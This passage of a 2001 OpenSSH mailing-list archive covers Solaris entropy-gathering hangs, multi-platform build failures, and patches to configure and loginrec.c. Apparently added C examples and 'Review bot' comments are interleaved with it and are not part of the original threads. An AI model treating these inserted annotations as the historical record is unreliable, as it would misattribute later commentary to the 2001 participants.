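    static const char tbl[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    unsigned int acc = 0;
    int bits = 0;
    size_t i, n = 0;

    for (i = 0; i < inlen && in[i] != '=' && n < outlen; i++) {
        const char *p = in[i] ? strchr(tbl, in[i]) : NULL;
        if (p == NULL)
            return -1;
        acc = (acc << 6) | (unsigned int)(p - tbl);
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            out[n++] = (unsigned char)((acc >> bits) & 0xff);
        }
    }
    return (int)n;
}

/* Append n bytes of src to NUL-terminated dst of capacity cap, truncating if needed. */
static void append(char *dst, size_t cap, const char *src, size_t n)
{
    size_t cur = strlen(dst);
    if (n > cap - 1 - cur)
        n = cap - 1 - cur;
    memcpy(dst + cur, src, n);
    dst[cur + n] = '\0';
}

/* Convert a SECSH public key file (BEGIN/END envelope, "Tag: value" header lines
 * with backslash continuation, wrapped base64 body) to OpenSSH's one-line form
 * "<type> <base64> [comment]". Returns 0 on success, -1 if the input is not usable. */
int secsh_to_openssh(const char *secsh, char *out, size_t outlen)
{
    char body[4096] = "", comment[256] = "", type[64];
    unsigned char blob[48];
    const char *line = secsh, *colon;
    size_t clen;
    unsigned int tlen;
    int in_key = 0, continued = 0, is_comment = 0, blen;

    while (*line != '\0') {
        const char *eol = strchr(line, '\n');
        size_t len = eol ? (size_t)(eol - line) : strlen(line);

        if (len > 0 && line[len - 1] == '\r')
            len--;
        if (strncmp(line, "---- BEGIN", 10) == 0) {
            in_key = 1;
        } else if (strncmp(line, "---- END", 8) == 0) {
            break;
        } else if (in_key && continued) {            /* rest of a wrapped header value */
            continued = len > 0 && line[len - 1] == '\\';
            if (is_comment)
                append(comment, sizeof(comment), line, len - (continued ? 1 : 0));
        } else if (in_key && (colon = memchr(line, ':', len)) != NULL) {  /* header line */
            const char *val = colon + 1;
            size_t vlen = len - (size_t)(colon - line) - 1;
            while (vlen > 0 && *val == ' ') { val++; vlen--; }
            continued = vlen > 0 && val[vlen - 1] == '\\';
            is_comment = (colon - line == 7 && strncasecmp(line, "Comment", 7) == 0);
            if (is_comment)
                append(comment, sizeof(comment), val, vlen - (continued ? 1 : 0));
        } else if (in_key) {                         /* base64 never contains ':' */
            append(body, sizeof(body), line, len);
        }
        line = eol ? eol + 1 : line + len;
    }
    if (!in_key || body[0] == '\0')
        return -1;

    /* Both formats start the blob with a uint32 length and the key type string;
     * 64 base64 characters decode to 48 bytes, enough for any type name in use. */
    blen = b64_decode(body, strlen(body) < 64 ? strlen(body) : 64, blob, sizeof(blob));
    if (blen < 4)
        return -1;
    tlen = ((unsigned int)blob[0] << 24) | ((unsigned int)blob[1] << 16) |
           ((unsigned int)blob[2] << 8) | blob[3];
    if (tlen == 0 || tlen > (unsigned int)blen - 4 || tlen >= sizeof(type))
        return -1;
    memcpy(type, blob + 4, tlen);
    type[tlen] = '\0';

    /* ssh-keygen -e wraps the comment in double quotes; take them off again. */
    clen = strlen(comment);
    if (clen >= 2 && comment[0] == '"' && comment[clen - 1] == '"') {
        memmove(comment, comment + 1, clen - 2);
        comment[clen - 2] = '\0';
    }
    if (comment[0] == '\0')
        return snprintf(out, outlen, "%s %s", type, body) < (int)outlen ? 0 : -1;
    return snprintf(out, outlen, "%s %s %s", type, body, comment) < (int)outlen ? 0 : -1;
}
```

The private-key direction has no such shortcut, which is the point of the replies above: the public blob is a documented wire structure, while the encrypted private container is vendor-specific.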
From: c.bailiff at devsecure.com (Cris Bailiff) Date: Wed, 06 Jun 2001 18:38:01 +1000 Subject: ssh_prng_cmds on Solaris Message-ID: <3B1DEBE9.9D2B5874@devsecure.com> Hi, I'm trying to build an openssh pkgadd package which is portable across Solaris 2.6, 7 & 8, so I can't rely on /dev/random support and must instead fall back to ssh_prng_cmds for collecting entropy. One of the default commands in ssh_prng_cmds, "arp -a -n", is a problem for any (2.6, at least) host which doesn't have an efficient/working DNS or other name resolution system - basically, without name service, this command hangs for a very long time, so effectively DoS'ing the sshd. The problem is that 'arp -a' doesn't seem to recognise '-n', and arp desperately wants to resolve (at least) 224.0.0.0 (the interface multicast address). The command doesn't add much entropy either, as apart from the long wait, its output is the same as "netstat -pn" two lines above (which does understand '-n' and doesn't hang on DNS). Of course I can 'fix' it locally (remove it), and put the fix in my package, but I thought I should report it here in the hope that it's 'fixed' properly in a future release, and I have one less local patch to worry about. Hopefully, this note in the archive might help some other poor Solaris user out in future too. Cris c.bailiff at devsecure.com From atossava at cc.helsinki.fi Wed Jun 6 21:31:58 2001
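A command list used for entropy gathering has to be robust against exactly the failure Cris describes: one blocking command must not stall the daemon that runs it. The following is an added example, not OpenSSH's entropy.c, showing a harvester that runs each command with a hard deadline and kills it (together with any helpers in its process group) when the deadline passes, keeping whatever partial output had arrived. The use of /bin/sh, the deadline values and the sample commands in the test are assumptions made for the demonstration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/select.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <unistd.h>

enum { CMD_OK = 0, CMD_TIMEOUT = 1, CMD_ERROR = -1 };

/* Milliseconds left until deadline, or 0 if it has already passed. */
static long ms_until(const struct timeval *deadline)
{
    struct timeval now;
    long ms;

    gettimeofday(&now, NULL);
    ms = (deadline->tv_sec - now.tv_sec) * 1000L + (deadline->tv_usec - now.tv_usec) / 1000L;
    return ms > 0 ? ms : 0;
}

/* Run cmd through /bin/sh -c with stdout captured into buf (at most buflen-1 bytes,
 * always NUL-terminated). When timeout_ms elapses the command's whole process group
 * is killed, so a command stuck in name resolution cannot stall the caller. Returns
 * CMD_OK, CMD_TIMEOUT or CMD_ERROR; *outlen receives the bytes captured, which may
 * be partial output on timeout. */
int run_with_timeout(const char *cmd, int timeout_ms, char *buf, size_t buflen, size_t *outlen)
{
    int pfd[2], status, result = CMD_OK;
    size_t total = 0;
    pid_t pid;
    struct timeval deadline;

    if (pipe(pfd) == -1)
        return CMD_ERROR;
    if ((pid = fork()) == -1) {
        close(pfd[0]);
        close(pfd[1]);
        return CMD_ERROR;
    }
    if (pid == 0) {
        setpgid(0, 0);                       /* own group, so kill(-pid) also reaches helpers */
        close(pfd[0]);
        dup2(pfd[1], STDOUT_FILENO);
        close(pfd[1]);
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);
    }
    setpgid(pid, pid);                       /* parent side of the same call closes the race */
    close(pfd[1]);

    gettimeofday(&deadline, NULL);
    deadline.tv_sec += timeout_ms / 1000;
    deadline.tv_usec += (timeout_ms % 1000) * 1000;
    if (deadline.tv_usec >= 1000000) {
        deadline.tv_sec++;
        deadline.tv_usec -= 1000000;
    }

    for (;;) {
        fd_set rfds;
        struct timeval tv;
        long left = ms_until(&deadline);
        ssize_t n;
        int rc;

        if (left == 0) {
            result = CMD_TIMEOUT;
            break;
        }
        tv.tv_sec = left / 1000;
        tv.tv_usec = (left % 1000) * 1000;
        FD_ZERO(&rfds);
        FD_SET(pfd[0], &rfds);
        rc = select(pfd[0] + 1, &rfds, NULL, NULL, &tv);
        if (rc == -1 && errno == EINTR)
            continue;
        if (rc <= 0) {
            result = rc == 0 ? CMD_TIMEOUT : CMD_ERROR;
            break;
        }
        n = read(pfd[0], buf + total, buflen - 1 - total);
        if (n <= 0)                          /* EOF (or buffer full): stop reading */
            break;
        total += (size_t)n;
    }
    close(pfd[0]);
    if (result != CMD_OK && kill(-pid, SIGKILL) == -1)
        kill(pid, SIGKILL);                  /* group already gone: kill the leader itself */
    while (waitpid(pid, &status, 0) == -1 && errno == EINTR)
        ;
    buf[total] = '\0';
    if (outlen != NULL)
        *outlen = total;
    return result;
}
```

A harvester built on this loop can run the whole command list with a bounded worst case, and a command that times out every time (as `arp -a` does here without name service) shows up as contributing nothing, which is the signal to drop it from the list rather than wait on it.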
From: atossava at cc.helsinki.fi (Atro Tossavainen) Date: Wed, 6 Jun 2001 14:31:58 +0300 (EET DST) Subject: Failure to compile OpenSSH. Message-ID: <200106061131.f56BVxg16901@sirppi.helsinki.fi> Hello guys. Following Dug's withdrawal of the SSH1 AFS patches, I'm trying to give OpenSSH installation another shot. It fails. The setting: * Platforms: Linux (Immunix 6.2), Solaris 7, IRIX 6.5, OSF1 4.0F, HP-UX 10.20. * Compilers: StackGuard egcs on Linux, vendor-supplied native on others (Workshop 5.0 Sun; MIPSpro 7.3 SGI; OSFCMPLRS440 package; HP ANSI C compiler B3899BA B.10.20.07) * Kerberos: KTH krb4 1.0.8 on all platforms, installed on AFS, /usr/athena linked to /afs/biocenter.helsinki.fi/v/@sys/libraries/kth-krb4/latest on all * AFS: AFS 3.6 Patch #2 (Base configuration 2.14) on all but HP-UX (3.4a). * Zlib: 1.1.3 on all platforms. Installed locally on IRIX and Linux, on AFS on others. -I and -L given in CFLAGS and LDFLAGS where needed. * OpenSSL: 0.9.6a on all platforms, installed on AFS, at /afs/biocenter.helsinki.fi/v/@sys/libraries/openssl/latest * Configure line: ./configure --with-ssl-dir=/afs/biocenter.helsinki.fi/v/@sys/libraries/openssl/latest --with-kerberos4=/usr/athena --with-afs=/usr/afsws Results: Linux: Configure fails to find OpenSSL. (1) Solaris: Configure fails to find OpenSSL. (2) SGI: Configure fails to find OpenSSL. (3) Alpha: Configure succeeds, build fails. (4) HP: Configure succeeds, build fails. 
(5) (1) configure:4411: gcc -o conftest -g -O2 -Wall -I/afs/bi/v/@sys/libraries/openssl/latest/include -L/afs/bi/v/@sys/libraries/openssl/latest/lib conftest.c -lz -lnsl -lutil -lcrypto 1>&5 /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(dso_dlfcn.o): In function `dlfcn_load': dso_dlfcn.o(.text+0x9e): undefined reference to `dlopen' dso_dlfcn.o(.text+0xb4): undefined reference to `dlopen' dso_dlfcn.o(.text+0x10a): undefined reference to `dlclose' /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(dso_dlfcn.o): In function `dlfcn_bind_var': dso_dlfcn.o(.text+0x1f3): undefined reference to `dlsym' /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(dso_dlfcn.o): In function `dlfcn_bind_func': dso_dlfcn.o(.text+0x2f3): undefined reference to `dlsym' /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(dso_dlfcn.o): In function `dlfcn_unload': dso_dlfcn.o(.text+0x472): undefined reference to `dlclose' collect2: ld returned 1 exit status (2) configure:4354: checking for OpenSSL directory configure:4411: cc -o conftest -I/afs/bi/p/include -I/afs/bi/v/@sys/libraries/openssl/latest/include -I/usr/local/include -R/afs/bi/v/@sys/libraries/openssl/latest/lib -L/afs/bi/v/@sys/libraries/openssl/latest/lib -L/afs/bi/p/lib -ldl -L/usr/local/lib -R/usr/local/lib conftest.c -lz -lsocket -lnsl -lgen -lcrypto 1>&5 configure: failed program was: #line 4397 "configure" #include "confdefs.h" #include #include int main(void) { char a[2048]; memset(a, 0, sizeof(a)); RAND_add(a, sizeof(a), sizeof(a)); return(RAND_status() <= 0); } (3) configure:4354: checking for OpenSSL directory configure:4411: cc -o conftest -g -I/usr/local/include conftest.c -lz -lgen -lcrypto 1>&5 cc-1005 cc: ERROR File = configure, Line = 4400 The source file "openssl/rand.h" is unavailable. #include ^ 1 catastrophic error detected in the compilation of "conftest.c". Compilation terminated. 
configure: failed program was: #line 4397 "configure" #include "confdefs.h" #include #include int main(void) { char a[2048]; memset(a, 0, sizeof(a)); RAND_add(a, sizeof(a), sizeof(a)); return(RAND_status() <= 0); } (4) cc: Info: /usr/athena/include/ktypes.h, line 18: In this declaration, "u_int32_t" has a duplicate typedef at line number 189 in file defines.h. This might not be portable. (duptypedef) typedef unsigned int u_int32_t; /* 32 bits */ ---------------------^ gmake: *** [radix.o] Error 1 (5) cc -Ae -I/afs/bi/p/include -Ae -I. -I.. -I. -I./.. -I/afs/bi/v/@sys/libraries/openssl/latest/include -D_HPUX_SOURCE -I/usr/athena/include -I/usr/afsws/include -DHAVE_CONFIG_H -c strmode.c cc: "../openbsd-compat/glob.h", line 48: warning 617: Redeclaration of tag "stat" ignored. cc: "strmode.c", line 45: error 1711: Inconsistent parameter list declaration for "strmode". gmake[1]: *** [strmode.o] Error 1 gmake[1]: Leaving directory `/scratch/openssh-2.9p1/openbsd-compat' gmake: *** [openbsd-compat/libopenbsd-compat.a] Error 2 -- Atro Tossavainen (Mr.) / The Institute of Biotechnology at Systems Analyst, Techno-Amish & / the University of Helsinki, Finland, +358-9-19158939 UNIX Dinosaur / employs me, but my opinions are my own. < URL : http : / / www . iki . fi / atro . tossavainen / > From Markus.Friedl at informatik.uni-erlangen.de Wed Jun 6 22:35:39 2001 
From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Wed, 6 Jun 2001 14:35:39 +0200 Subject: Failure to compile OpenSSH. In-Reply-To: <200106061131.f56BVxg16901@sirppi.helsinki.fi>; from atossava@cc.helsinki.fi on Wed, Jun 06, 2001 at 02:31:58PM +0300 References: <200106061131.f56BVxg16901@sirppi.helsinki.fi> Message-ID: <20010606143539.A13062@faui02.informatik.uni-erlangen.de> On Wed, Jun 06, 2001 at 02:31:58PM +0300, Atro Tossavainen wrote: > Linux: Configure fails to find OpenSSL. (1) i have seen this if libz.so is installed at strange places. does static linking work? From atossava at cc.helsinki.fi Wed Jun 6 23:14:49 2001 
From: atossava at cc.helsinki.fi (Atro Tossavainen) Date: Wed, 6 Jun 2001 16:14:49 +0300 (EET DST) Subject: Failure to compile OpenSSH. In-Reply-To: <20010606143539.A13062@faui02.informatik.uni-erlangen.de> from Markus Friedl at "Jun 6, 2001 02:35:39 pm" Message-ID: <200106061314.f56DEn814890@sirppi.helsinki.fi> >> Linux: Configure fails to find OpenSSL. (1) > > i have seen this if libz.so is installed at strange places. > does static linking work? libz is installed where RedHat puts it, i.e. /usr/lib. Since this is with gcc, I tried with LDFLAGS="-static" ./configure --with-ssl-dir=/afs/biocenter.helsinki.fi/v/@sys/libraries/openssl/latest fails the same way. dso_dlfcn.o in OpenSSL libcrypto.a refers to the undefined functions dlopen, dlclose, dlsym. Explicitly including -ldl in LDFLAGS allowed configure to finish properly (without -static in LDFLAGS, I should probably add). Now, the build fails, with the following error messages: gcc -o ssh ssh.o sshconnect.o sshconnect1.o sshconnect2.o sshtty.o readconf.o clientloop.o -L. 
-Lopenbsd-compat/ -L/afs/bi/v/@sys/libraries/openssl/latest/lib -ldl -L/usr/athena/lib -L/usr/afsws/lib -lssh -lopenbsd-compat -lkafs -lresolv -ldes -lkrb -lz -lnsl -lutil -lcrypto -lcrypt -ldes /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(dx86-elf.o): In function `des_encrypt2': dx86-elf.o(.text+0x1040): multiple definition of `des_encrypt2' /usr/athena/lib/libdes.a(des_enc.o):/home/atossava/krb4-1.0.8/lib/des/./des_enc.c:166: first defined here /usr/bin/ld: Warning: size of symbol `des_encrypt2' changed from 5153 to 3999 in dx86-elf.o /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(dx86-elf.o): In function `des_encrypt3': dx86-elf.o(.text+0x1fe0): multiple definition of `des_encrypt3' /usr/athena/lib/libdes.a(des_enc.o):/home/atossava/krb4-1.0.8/lib/des/./des_enc.c:261: first defined here /usr/bin/ld: Warning: size of symbol `des_encrypt3' changed from 329 to 292 in dx86-elf.o /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(dx86-elf.o): In function `des_decrypt3': dx86-elf.o(.text+0x2110): multiple definition of `des_decrypt3' /usr/athena/lib/libdes.a(des_enc.o):/home/atossava/krb4-1.0.8/lib/des/./des_enc.c:284: first defined here /usr/bin/ld: Warning: size of symbol `des_decrypt3' changed from 329 to 292 in dx86-elf.o /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(dx86-elf.o): In function `des_ncbc_encrypt': dx86-elf.o(.text+0x2240): multiple definition of `des_ncbc_encrypt' /usr/athena/lib/libdes.a(ncbc_enc.o):/home/atossava/krb4-1.0.8/lib/des/ncbc_enc.c:68: first defined here /usr/bin/ld: Warning: size of symbol `des_ncbc_encrypt' changed from 1297 to 480 in dx86-elf.o /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(dx86-elf.o): In function `des_ede3_cbc_encrypt': dx86-elf.o(.text+0x2420): multiple definition of `des_ede3_cbc_encrypt' /usr/athena/lib/libdes.a(ede_enc.o):/home/atossava/krb4-1.0.8/lib/des/ede_enc.c:70: first defined here /usr/bin/ld: Warning: size of symbol `des_ede3_cbc_encrypt' changed from 1341 to 
480 in dx86-elf.o /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(set_key.o)(.data+0x0): multiple definition of `des_check_key' /usr/athena/lib/libdes.a(set_key.o):/home/atossava/krb4-1.0.8/lib/des/set_key.c:80: first defined here /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(set_key.o): In function `des_set_odd_parity': set_key.o(.text+0x390): multiple definition of `des_set_odd_parity' /usr/athena/lib/libdes.a(set_key.o):/home/atossava/krb4-1.0.8/lib/des/set_key.c:80: first defined here /usr/bin/ld: Warning: size of symbol `des_set_odd_parity' changed from 97 to 125 in set_key.o /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(set_key.o): In function `des_is_weak_key': set_key.o(.text+0x4a0): multiple definition of `des_is_weak_key' /usr/athena/lib/libdes.a(set_key.o):/home/atossava/krb4-1.0.8/lib/des/set_key.c:137: first defined here /usr/bin/ld: Warning: size of symbol `des_is_weak_key' changed from 121 to 153 in set_key.o /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(set_key.o): In function `des_set_key': set_key.o(.text+0x540): multiple definition of `des_set_key' /usr/athena/lib/libdes.a(set_key.o):/home/atossava/krb4-1.0.8/lib/des/set_key.c:166: first defined here /usr/bin/ld: Warning: size of symbol `des_set_key' changed from 733 to 133 in set_key.o /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(set_key.o): In function `des_key_sched': set_key.o(.text+0x5d0): multiple definition of `des_key_sched' /usr/athena/lib/libdes.a(set_key.o):/home/atossava/krb4-1.0.8/lib/des/set_key.c:247: first defined here /usr/bin/ld: Warning: size of symbol `des_key_sched' changed from 73 to 133 in set_key.o collect2: ld returned 1 exit status make: *** [ssh] Error 1 -- Atro Tossavainen (Mr.) / The Institute of Biotechnology at Systems Analyst, Techno-Amish & / the University of Helsinki, Finland, +358-9-19158939 UNIX Dinosaur / employs me, but my opinions are my own. < URL : http : / / www . iki . fi / atro . 
tossavainen / > From janj-openssh at wenf.org Thu Jun 7 01:21:55 2001 From: janj-openssh at wenf.org (Jan Johansson) Date: Wed, 6 Jun 2001 17:21:55 +0200 Subject: Compile error 2.9p1 / Solaris 8 / Kerberos IV Message-ID: <20010606172153.X7465@the.placid.tv> Hello, trying to compile 2.9p1 on my Solaris 8 box [1]. I can compile without Kerberos but adding --with-kerberos4=/opt/KTHkrb4 it fails [2]. The build dir can be seen on http://www.isk.kth.se/~janj/openssh/ Is there something I can do to fix this? [1] SunOS nemesis 5.8 Generic_108528-07 sun4u sparc SUNW,Ultra-5_10 [2] cc -g -I. -I../openssh-2.9p1 -I/opt/local/openssl/0.9.6/include -I/usr/local/include -I/opt/KTHkrb4/include -DETCDIR=\"/etc/ssh\" -D_PATH_SSH_PROGRAM=\"/opt/local/ssh/2.9p1/bin/ssh\" -D_PATH_SSH_ASKPASS_DEFAULT=\"/opt/local/ssh/2.9p1/libexec/ssh-askpass\" -D_PATH_SFTP_SERVER=\"/opt/local/ssh/2.9p1/libexec/sftp-server\" -D_PATH_SSH_PIDDIR=\"/var/run\" -DHAVE_CONFIG_H -c ../openssh-2.9p1/auth-passwd.c "/opt/KTHkrb4/include/ktypes.h", line 14: warning: typedef redeclared: u_int8_t "/opt/KTHkrb4/include/ktypes.h", line 15: warning: typedef redeclared: u_int16_t "/opt/KTHkrb4/include/ktypes.h", line 16: warning: typedef redeclared: u_int32_t "/usr/include/crypt.h", line 23: identifier redeclared: des_encrypt current : function(pointer to char, int) returning void previous: function(pointer to unsigned long, pointer to struct des_ks_struct {union {..} ks}, int) returning void : "/opt/KTHkrb4/include/des.h", line 181 cc: acomp failed for ../openssh-2.9p1/auth-passwd.c *** Error code 2 make: Fatal error: Command failed for target `auth-passwd.o' From pere at opera.com Thu Jun 7 03:09:39 2001 
From: pere at opera.com (Petter Reinholdtsen) Date: Wed, 06 Jun 2001 19:09:39 +0200 Subject: configure patch for Alpha/Tru64 Unix 5.1 Message-ID: I had to apply this patch to configure.in to get configure to run on Tru64 Unix on Alpha. The RSA test forgot to reset $LIBS. (The compile stopped with missing "zlib.h". I'll send more patches if required. :-) diff -ur src-2.9p1/configure.in src-2.9p1-local/configure.in --- src-2.9p1/configure.in Wed Jun 6 17:15:09 2001 +++ src-2.9p1-local/configure.in Wed Jun 6 19:06:07 2001 @@ -683,6 +683,7 @@ break; ], []) done +LIBS="$saved_LIBS" if test ! -z "$no_rsa" ; then AC_MSG_RESULT(disabled) @@ -698,7 +699,7 @@ else RSA_MSG="yes (using RSAref)" AC_MSG_RESULT(using RSAref) - LIBS="$saved_LIBS -lcrypto -lRSAglue -lrsaref" + LIBS="$LIBS -lcrypto -lRSAglue -lrsaref" fi fi fi -- ##> Petter Reinholdtsen <## | pere at td.org.uit.no O- http://www.hungry.com/~pere/ | Go Mozilla, go! Go! From wayne at blorf.net Thu Jun 7 03:28:36 2001 From: wayne at blorf.net (Wayne Davison) Date: Wed, 6 Jun 2001 10:28:36 -0700 (PDT) Subject: Remove duplicate "last" log messages with UseLogin Message-ID: Using UseLogin on a system that has to twiddle utmpx before calling login currently also twiddles wtmpx, and this causes problems on Solaris in the "last" log. Changing the source to avoid modifying wtmpx when also modifying utmpx fixes things up nicely: Index: loginrec.c --- loginrec.c 2001/05/08 20:33:06 1.33 +++ loginrec.c 2001/06/06 17:14:25 @@ -456,9 +456,10 @@ # endif # ifdef USE_UTMPX utmpx_write_entry(li); -# endif -# ifdef USE_WTMPX +# else +# ifdef USE_WTMPX wtmpx_write_entry(li); +# endif # endif return 0; } Now running "last -10" after logging in has only a single entry for each ssh user, rather than a totally bogus entry before each valid entry. I'd be interested in knowing if this works properly on UNICOS or not. ..wayne.. From wayne at blorf.net Thu Jun 7 04:22:20 2001 
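Review bot: the added `LIBS="$saved_LIBS"` after `done` unconditionally discards whatever link line the loop settled on, and only the RSAref branch in the second hunk adds libraries back. The `no_rsa` branch and the plain (non-RSAref) branch are outside this diff; confirm that neither relies on the loop leaving `-lcrypto` in LIBS, and put a one-line comment on the reset saying that every branch below re-adds its own libraries, since the second hunk's `LIBS="$LIBS -lcrypto -lRSAglue -lrsaref"` is only correct because this reset ran first.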
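Review bot: in the loginrec.c hunk, nesting `# ifdef USE_WTMPX` under the `# else` of `USE_UTMPX` makes the utmpx and wtmpx cases mutually exclusive, which is the intended fix, but the `# endif` immediately above the hunk suggests a preceding USE_UTMP/USE_WTMP block that is left untouched, so the non-x pair is still written unconditionally. Either give wtmp the same treatment (the function is login_utmp_only, so writing any wtmp record here is questionable) or add a comment at the `# else` stating that the asymmetry is deliberate and why, so the next reader does not "fix" it back.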
From: wayne at blorf.net (Wayne Davison) Date: Wed, 6 Jun 2001 11:22:20 -0700 (PDT) Subject: One more UseLogin tweak Message-ID: One other thing I noticed in the record_utmp_only() function is that it wasn't setting the timestamp in the logininfo structure. The following patch takes care of this: --- old/loginrec.c Wed Jun 6 11:12:14 2001 +++ loginrec.c Wed Jun 6 11:13:42 2001 @@ -448,6 +448,8 @@ login_utmp_only(struct logininfo *li) { li->type = LTYPE_LOGIN; + /* set the timestamp */ + login_set_current_time(li); # ifdef USE_UTMP utmp_write_entry(li); # endif ..wayne.. From frank.beckmann at d2vodafone.de Wed Jun 6 19:18:41 2001 From: frank.beckmann at d2vodafone.de (Frank Beckmann) Date: Wed, 06 Jun 2001 11:18:41 +0200 Subject: Solaris 2.6 Use Login Message-ID: <3B1DF571.1B9BC31D@d2vodafone.de> Hello, We want to use the UseLogin function. I have downloaded the latest snapshot and tried it on a Solaris 2.6 system. We are working with special pam_modules; the modules can dienes services with control files based on local tables and NIS. We log the connects. Here is a log without UseLogin: Wed Jun 6 10:37:27 2001 [12265]#1: Access by user fbeckman with service sshd from zvadm1 on ? Wed Jun 6 10:37:27 2001 [12265]#2: Info: using NIS for host map (/etc/pam_hosts.tab) Wed Jun 6 10:37:27 2001 [12265]#3: Info: using NIS for ip map (/etc/pam_ip.tab) Wed Jun 6 10:37:27 2001 [12265]#4: Info: using NIS for user map (/etc/pam_users.tab) Wed Jun 6 10:37:27 2001 [12265]#5: Successful *** Here with UseLogin !!! *** Wed Jun 6 10:36:56 2001 [12259]#1: Access by user fbeckman with service telnet from zvadm1 on /dev/pts/25 Wed Jun 6 10:36:56 2001 [12259]#2: Info: using NIS for host map (/etc/pam_hosts.tab) Wed Jun 6 10:36:56 2001 [12259]#3: Reject by PAM host NIS: Host permission denied Do you see the difference? ssh is identified as telnet. It is a big security problem; we cannot see whether it is a telnet or an ssh connect. Greetings from Germany, Frank From stevesk at pobox.com Thu Jun 7 06:57:00 2001
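Review bot: the comment `/* set the timestamp */` on the added call only restates its name; say instead why it is needed (without it the entry is written with whatever time the caller left in `li`), and consider whether login_set_current_time() belongs in the caller that fills `li` rather than in login_utmp_only(), since any other writer fed from the same structure would otherwise have the same omission. The commit message refers to record_utmp_only() while the hunk context shows login_utmp_only(); use the real function name.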
From: stevesk at pobox.com (Kevin Steves) Date: Wed, 6 Jun 2001 13:57:00 -0700 (PDT) Subject: Failure to compile OpenSSH. In-Reply-To: <200106061131.f56BVxg16901@sirppi.helsinki.fi> Message-ID: On Wed, 6 Jun 2001, Atro Tossavainen wrote: :HP: Configure succeeds, build fails. (5) :(5) :cc -Ae -I/afs/bi/p/include -Ae -I. -I.. -I. -I./.. -I/afs/bi/v/@sys/libraries/openssl/latest/include -D_HPUX_SOURCE -I/usr/athena/include -I/usr/afsws/include -DHAVE_CONFIG_H -c strmode.c :cc: "../openbsd-compat/glob.h", line 48: warning 617: Redeclaration of tag "stat" ignored. :cc: "strmode.c", line 45: error 1711: Inconsistent parameter list declaration for "strmode". :gmake[1]: *** [strmode.o] Error 1 :gmake[1]: Leaving directory `/scratch/openssh-2.9p1/openbsd-compat' :gmake: *** [openbsd-compat/libopenbsd-compat.a] Error 2 that's a compiler bug that was fixed a long time ago. you can sync the function definition and declaration to be the same, or try: ftp.itrc.hp.com/superseded_patches/hp-ux_patches/s700_800/10.X/PHSS_17507.txt the newer compiler patches are only on the applications CDs that you get as part of software support, but i think that patch will fix it. From stevesk at pobox.com Thu Jun 7 07:16:13 2001 
From: stevesk at pobox.com (Kevin Steves) Date: Wed, 6 Jun 2001 14:16:13 -0700 (PDT) Subject: Defect: OpenSSH hangs on logout In-Reply-To: <20010606082224.C24958@eeg.ccf.org> Message-ID: On Wed, 6 Jun 2001, Greg Wooledge wrote: :> this is caused by select() being restarted for SIGCHLD on HP-UX due to the :> use of SA_RESTART. can you try the patch below and see if it fixes the :> problem for HP-UX and linux? i've tested on HP-UX 11.11. : :> -#if defined(SA_RESTART) :> +#if 0 : :This doesn't seem to make any difference on HP-UX 10.20. But then, :I'm using OpenSSH 2.5.2p2 instead of 2.9.x or CVS -- would that matter? [changing to openssh-unix-dev] i haven't used 10.20 for a long time. i'm currently only working with 11.11. i don't know if select() is restarted when SA_RESTART on 10.20, but i'd guess it is. while 2.5.2p2 has the SA_RESTART change, it would be best to test with 2.9. so: does 10.20 hang with 2.9 without the patch? with the patch? From jrippas at mizuhocap.com Thu Jun 7 07:49:16 2001 From: jrippas at mizuhocap.com (James Rippas) Date: Wed, 06 Jun 2001 17:49:16 -0400 Subject: One more UseLogin tweak -- why are the binaries so big? References: Message-ID: <3B1EA55C.C81B704F@mizuhocap.com> This works except the binaries seem to have gotten quite large. Is this normal with snapshots? When configured with the following options: --prefix=/usr/ssh --with-pcre --sysconfdir=/etc --with-pid-dir=/etc/ --with-random=/dev/random 2.9p1 -rwxr-xr-x 1 root sys 1225576 May 11 08:49 /usr/ssh/sbin/sshd.orig* openssh-SNAP-20010606 + UseLogin tweaks -rwxr-xr-x 1 root other 4614312 Jun 6 16:52 /usr/ssh/sbin/sshd* -jim Wayne Davison wrote: > > One other thing I noticed in the record_utmp_only() function is that > it wasn't setting the timestamp in the logininfo structure. The > following patch takes care of this: > > --- old/loginrec.c Wed Jun 6 11:12:14 2001 > +++ loginrec.c Wed Jun 6 11:13:42 2001 
> @@ -448,6 +448,8 @@ > login_utmp_only(struct logininfo *li) > { > li->type = LTYPE_LOGIN; > + /* set the timestamp */ > + login_set_current_time(li); > # ifdef USE_UTMP > utmp_write_entry(li); > # endif > > ..wayne.. From markus.friedl at informatik.uni-erlangen.de Thu Jun 7 08:36:30 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Thu, 7 Jun 2001 00:36:30 +0200 Subject: ssh-keyscan for ssh2 In-Reply-To: ; from wayne@blorf.net on Sat, May 19, 2001 at 02:14:53PM -0700 References: <20010519174431.A8551@folly> Message-ID: <20010607003630.A3268@folly> On Sat, May 19, 2001 at 02:14:53PM -0700, Wayne Davison wrote: > On Sat, 19 May 2001, Markus Friedl wrote: > > i think you can overload fatal() with longjmp(). > > Yeah, I was thinking of doing the same thing. I didn't do it earlier > because it means moving fatal() into its own file so that we don't end > up with a duplicate symbol. no, this is not needed. just do this instead: void fatal_callback(void *arg) { if (nonfatal_fatal) longjmp(kexjmp, -1); } and fatal_add_cleanup(fatal_callback, NULL); in main() From ecashin at terry.uga.edu Thu Jun 7 08:40:03 2001
